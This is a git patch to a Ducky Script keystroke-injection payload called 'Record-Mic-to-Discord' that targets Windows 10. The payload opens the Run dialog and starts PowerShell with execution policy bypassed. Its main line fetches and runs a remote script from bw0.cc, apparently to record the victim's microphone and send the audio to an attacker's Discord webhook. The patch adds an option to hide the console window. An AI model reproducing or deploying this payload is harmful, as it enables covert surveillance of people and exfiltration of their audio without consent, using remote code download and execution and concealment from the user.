From 6fc5b316c954408fa187e13b4a54e364a35b8854 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 20:52:38 +0000 Subject: [PATCH] Update Record-Mic-to-Discord.txt --- Record-Mic-to-Discord/Record-Mic-to-Discord.txt | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt index e8178c6..10ec8a7 100644 --- a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt +++ b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt @@ -6,15 +6,13 @@ REM Target: Windows 10 REM *SETUP* REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' .... +REM To hide the console, use $hide='y' below. -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/dcmic) +STRING powershell -Ep Bypass -C $hide='y'; $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/dcmic) ENTER